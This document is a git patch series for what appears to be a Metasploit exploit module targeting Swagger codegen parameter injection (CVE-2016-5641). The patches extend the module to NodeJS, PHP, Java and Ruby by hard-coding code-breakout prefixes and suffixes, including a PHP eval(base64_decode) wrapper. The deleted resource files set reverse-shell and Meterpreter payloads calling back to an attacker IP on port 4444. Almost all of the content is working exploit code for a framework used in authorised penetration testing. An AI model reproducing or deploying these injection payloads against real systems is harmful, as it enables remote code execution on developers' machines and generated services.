From 7a36d03fe3a2b0280a287aa27dcdc9fb3b9fa593 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 23 Jun 2016 12:34:51 -0500 Subject: [PATCH 1/7] Trying multi arch --- .../multi/fileformat/swagger_param_inject.rb | 47 +++++++++++++++---- 1 file changed, 39 insertions(+), 8 deletions(-) diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb index f8bdc91882..5759538220 100644 --- a/modules/exploits/multi/fileformat/swagger_param_inject.rb +++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb @@ -16,6 +16,8 @@ require 'msf/core' class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + include Msf::Exploit::FILEFORMAT def initialize(info = {}) @@ -40,14 +42,21 @@ class MetasploitModule < Msf::Exploit::Remote [ 'URL', 'http://github.com/swagger-api/swagger-codegen' ], [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641' ] ], - 'Platform' => %w{ nodejs }, - 'Arch' => ARCH_NODEJS, - 'Targets' => [['Automatic', {}]], + 'Platform' => %w{ nodejs php java ruby }, + 'Arch' => %w{ ARCH_NODEJS ARCH_RUBY ARCH_JAVA ARCH_RUBY }, + 'Targets' => [ + ['Automatic', {}], + ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS } ], + ['PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP } ], + ['Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA } ], + ['Ruby', { 'Platform' => 'ruby', 'Arch' => ARCH_RUBY } ] + ], 'DisclosureDate' => 'Jun 23 2016', 'DefaultTarget' => 0)) register_options( [ + OptString.new('FILENAME', [false, 'The file to write.', 'msf-swagger.json']), OptAddress.new('LHOST', [true, 'Server IP or hostname that the swagger codegen will callback to.']), OptPort.new('LPORT', [true, 'Server port.']), OptString.new('PAYLOAD_PREFIX', [false, 'Payload Injection prefix', '']), @@ -118,12 +127,34 @@ class MetasploitModule < Msf::Exploit::Remote end def exploit - # NodeJS only, for now. - wrapped_payload = datastore['PAYLOAD_PREFIX'] + - payload.encoded + datastore['PAYLOAD_SUFFIX'] - datastore[datastore['PAYLOAD_LOC']] = wrapped_payload.gsub(/"/, '\\"') + if datastore['PAYLOAD'] + case payload.arch[0] + when 'nodejs' + wrapped_payload = datastore['PAYLOAD_PREFIX'] + + payload.encoded + datastore['PAYLOAD_SUFFIX'] + datastore[datastore['PAYLOAD_LOC']] = wrapped_payload.gsub(/"/, '\\"') + when 'php' + wrapped_payload = datastore['PAYLOAD_PREFIX'] + + Base64.strict_encode64(payload.encoded) + + datastore['PAYLOAD_SUFFIX'] + datastore[datastore['PAYLOAD_LOC']] = wrapped_payload + when 'ruby' + wrapped_payload = datastore['PAYLOAD_PREFIX'] + + payload.encoded + datastore['PAYLOAD_SUFFIX'] + datastore[datastore['PAYLOAD_LOC']] = wrapped_payload + when 'java' + p = payload.encoded.gsub(/<%@page import="/, 'import ') + p = p.gsub(/\"%>/, ';').gsub(/<%/, '').gsub(/%>/, '') + p = p.gsub(/"/, '\\"').gsub(/\n/, ' ') + wrapped_payload = datastore['PAYLOAD_PREFIX'] + + p + datastore['PAYLOAD_SUFFIX'] + datastore[datastore['PAYLOAD_LOC']] = wrapped_payload + end + else + print_error("No payload defined!") + end + print_status swagger file_create swagger end - end From ffabf265932c6203d24ce0ba6588347ea3cb923b Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 23 Jun 2016 12:50:23 -0500 Subject: [PATCH 2/7] No Automatic target. --- modules/exploits/multi/fileformat/swagger_param_inject.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb index 5759538220..a322cdddb9 100644 --- a/modules/exploits/multi/fileformat/swagger_param_inject.rb +++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb @@ -45,7 +45,6 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => %w{ nodejs php java ruby }, 'Arch' => %w{ ARCH_NODEJS ARCH_RUBY ARCH_JAVA ARCH_RUBY }, 'Targets' => [ - ['Automatic', {}], ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS } ], ['PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP } ], ['Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA } ], From 92c70dab6f59319e18983f1eb32a500b36b280cc Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 23 Jun 2016 13:22:21 -0500 Subject: [PATCH 3/7] Real array, and fix PHP --- modules/exploits/multi/fileformat/swagger_param_inject.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb index a322cdddb9..0f3da9df33 100644 --- a/modules/exploits/multi/fileformat/swagger_param_inject.rb +++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb @@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/06/23/r7-2016-06-remote-code-execution-via-swagger-parameter-injection-cve-2016-5641' ] ], 'Platform' => %w{ nodejs php java ruby }, - 'Arch' => %w{ ARCH_NODEJS ARCH_RUBY ARCH_JAVA ARCH_RUBY }, + 'Arch' => [ ARCH_NODEJS, ARCH_PHP, ARCH_JAVA, ARCH_RUBY ], 'Targets' => [ ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => ARCH_NODEJS } ], ['PHP', { 'Platform' => 'php', 'Arch' => ARCH_PHP } ], From 464808d825bed94a67394a27b9a3daf168d41a06 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 23 Jun 2016 14:43:37 -0500 Subject: [PATCH 4/7] First, put the RC data in the module proper --- .../multi/fileformat/swagger_param_inject.rb | 38 ++++++++++++------- 1 file changed, 25 insertions(+), 13 deletions(-) diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb index 0f3da9df33..1ccfa8a109 100644 --- a/modules/exploits/multi/fileformat/swagger_param_inject.rb +++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb @@ -60,9 +60,8 @@ class MetasploitModule < Msf::Exploit::Remote OptPort.new('LPORT', [true, 'Server port.']), OptString.new('PAYLOAD_PREFIX', [false, 'Payload Injection prefix', '']), OptString.new('PAYLOAD_SUFFIX', [false, 'Payload Injection suffix', '']), - OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point', 'INFO_DESCRIPTION', ['INFO_DESCRIPTION', 'INFO_VERSION', 'INFO_TITLE', 'SWAGGER_HOST', 'BASE_PATH', 'PATH', 'PATH_DESRIPTION', 'PATH_RESPONSE_DESCRIPTION', 'DEFINITION_DESCRIPTION'] ]), OptString.new('INFO_DESCRIPTION', [true, 'Swagger info description', 'A']), - OptString.new('INFO_VERSION', [true, 'Swagger info version.', 'B']), + OptString.new('INFO_VERSION', [true, 'Swagger info version.', '1.0.0']), OptString.new('INFO_TITLE', [true, 'Swagger info title.', 'C']), OptEnum.new('SWAGGER_SCHEME', [true, 'Protocol scheme', 'http', ['http','https','ws','wss']]), OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4']), @@ -129,25 +128,38 @@ class MetasploitModule < Msf::Exploit::Remote if datastore['PAYLOAD'] case payload.arch[0] when 'nodejs' - wrapped_payload = datastore['PAYLOAD_PREFIX'] + - payload.encoded + datastore['PAYLOAD_SUFFIX'] - datastore[datastore['PAYLOAD_LOC']] = wrapped_payload.gsub(/"/, '\\"') + payload_loc = 'PATH' + payload_prefix = "/a');};};return exports;}));" + payload_suffix = "(function(){}(this,function(){a=function(){b=function(){new Array('" + wrapped_payload = payload_prefix + + payload.encoded + + payload_suffix + datastore[payload_loc] = wrapped_payload.gsub(/"/, '\\"') when 'php' - wrapped_payload = datastore['PAYLOAD_PREFIX'] + - Base64.strict_encode64(payload.encoded) + - datastore['PAYLOAD_SUFFIX'] - datastore[datastore['PAYLOAD_LOC']] = wrapped_payload + payload_loc = 'INFO_DESCRIPTION' + payload_prefix = "*/ namespace foobar; eval(base64_decode('" + payload_suffix = "')); /*" + wrapped_payload = payload_prefix + + Base64.strict_encode64(payload.encoded) + + payload_suffix + datastore[payload_loc] = wrapped_payload when 'ruby' - wrapped_payload = datastore['PAYLOAD_PREFIX'] + - payload.encoded + datastore['PAYLOAD_SUFFIX'] - datastore[datastore['PAYLOAD_LOC']] = wrapped_payload + payload_loc = 'INFO_TITLE' + payload_prefix = "=end " + payload_suffix = "=begin " + wrapped_payload = payload_prefix + + payload.encoded + + payload_suffix + datastore[payload_loc] = wrapped_payload when 'java' + payload_loc = 'PATH' + payload_prefix = "a\\\"; " p = payload.encoded.gsub(/<%@page import="/, 'import ') p = p.gsub(/\"%>/, ';').gsub(/<%/, '').gsub(/%>/, '') p = p.gsub(/"/, '\\"').gsub(/\n/, ' ') wrapped_payload = datastore['PAYLOAD_PREFIX'] + p + datastore['PAYLOAD_SUFFIX'] - datastore[datastore['PAYLOAD_LOC']] = wrapped_payload + datastore[payload_loc] = wrapped_payload end else print_error("No payload defined!") From 08d08d2c951f293490e57758a27ebc15a7340b9b Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 23 Jun 2016 14:51:26 -0500 Subject: [PATCH 5/7] Fix Java payload generator --- modules/exploits/multi/fileformat/swagger_param_inject.rb | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/modules/exploits/multi/fileformat/swagger_param_inject.rb b/modules/exploits/multi/fileformat/swagger_param_inject.rb index 1ccfa8a109..4c7c7878b3 100644 --- a/modules/exploits/multi/fileformat/swagger_param_inject.rb +++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb @@ -153,12 +153,11 @@ class MetasploitModule < Msf::Exploit::Remote datastore[payload_loc] = wrapped_payload when 'java' payload_loc = 'PATH' - payload_prefix = "a\\\"; " + payload_prefix = %q{a\\\"; "} p = payload.encoded.gsub(/<%@page import="/, 'import ') p = p.gsub(/\"%>/, ';').gsub(/<%/, '').gsub(/%>/, '') p = p.gsub(/"/, '\\"').gsub(/\n/, ' ') - wrapped_payload = datastore['PAYLOAD_PREFIX'] + - p + datastore['PAYLOAD_SUFFIX'] + wrapped_payload = datastore['PAYLOAD_PREFIX'] + p datastore[payload_loc] = wrapped_payload end else From 92522138c5ab0fe974b6a40d457a4d7442849af1 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 23 Jun 2016 14:52:23 -0500 Subject: [PATCH 6/7] Remove the RC files --- .../fileformat/swagger_param_inject/java-codegen.rc | 11 ----------- .../swagger_param_inject/nodejs-codegen.rc | 13 ------------- .../fileformat/swagger_param_inject/php-codegen.rc | 11 ----------- .../fileformat/swagger_param_inject/ruby-codegen.rc | 12 ------------ 4 files changed, 47 deletions(-) delete mode 100644 documentation/modules/exploit/multi/fileformat/swagger_param_inject/java-codegen.rc delete mode 100644 documentation/modules/exploit/multi/fileformat/swagger_param_inject/nodejs-codegen.rc delete mode 100644 documentation/modules/exploit/multi/fileformat/swagger_param_inject/php-codegen.rc delete mode 100644 documentation/modules/exploit/multi/fileformat/swagger_param_inject/ruby-codegen.rc diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/java-codegen.rc b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/java-codegen.rc deleted file mode 100644 index 2139734518..0000000000 --- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/java-codegen.rc +++ /dev/null @@ -1,11 +0,0 @@ -set PAYLOAD java/jsp_shell_reverse_tcp - -use exploit/multi/fileformat/swagger_param_inject - -set PAYLOAD_LOC "PATH" -set PAYLOAD_PREFIX "a\\\"; " - -set LHOST 192.168.68.138 -set LPORT 4444 - -run \ No newline at end of file diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/nodejs-codegen.rc b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/nodejs-codegen.rc deleted file mode 100644 index 36a24b256f..0000000000 --- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/nodejs-codegen.rc +++ /dev/null @@ -1,13 +0,0 @@ -set PAYLOAD nodejs/shell_reverse_tcp - -use exploit/multi/fileformat/swagger_param_inject - -set INFO_VERSION "1.0.0" -set PAYLOAD_LOC "PATH" -set PAYLOAD_PREFIX "/a');};};return exports;}));" -set PAYLOAD_SUFFIX "(function(){}(this,function(){a=function(){b=function(){new Array('" - -set LHOST 192.168.68.138 -set LPORT 4444 - -run \ No newline at end of file diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/php-codegen.rc b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/php-codegen.rc deleted file mode 100644 index fd7502cf9b..0000000000 --- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/php-codegen.rc +++ /dev/null @@ -1,11 +0,0 @@ -set PAYLOAD php/meterpreter/reverse_tcp - -use exploit/multi/fileformat/swagger_param_inject - -set PAYLOAD_PREFIX "*/ namespace foobar; eval(base64_decode('" -set PAYLOAD_SUFFIX "')); /*" - -set LHOST 192.168.68.138 -set LPORT 4444 - -run \ No newline at end of file diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/ruby-codegen.rc b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/ruby-codegen.rc deleted file mode 100644 index a69fdda505..0000000000 --- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/ruby-codegen.rc +++ /dev/null @@ -1,12 +0,0 @@ -set PAYLOAD ruby/shell_reverse_tcp - -use exploit/multi/fileformat/swagger_param_inject - -set PAYLOAD_LOC "INFO_TITLE" -set PAYLOAD_PREFIX "=end " -set INFO_DESCRIPTION "=begin " - -set LHOST 192.168.68.138 -set LPORT 4444 - -run \ No newline at end of file From ff741fbc35689f18646fa1efdc383562baf4f125 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 23 Jun 2016 14:53:49 -0500 Subject: [PATCH 7/7] Rename for docs --- .../{swagger_param_inject/README.md => swagger_param_inject.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename documentation/modules/exploit/multi/fileformat/{swagger_param_inject/README.md => swagger_param_inject.md} (100%) diff --git a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md b/documentation/modules/exploit/multi/fileformat/swagger_param_inject.md similarity index 100% rename from documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md rename to documentation/modules/exploit/multi/fileformat/swagger_param_inject.md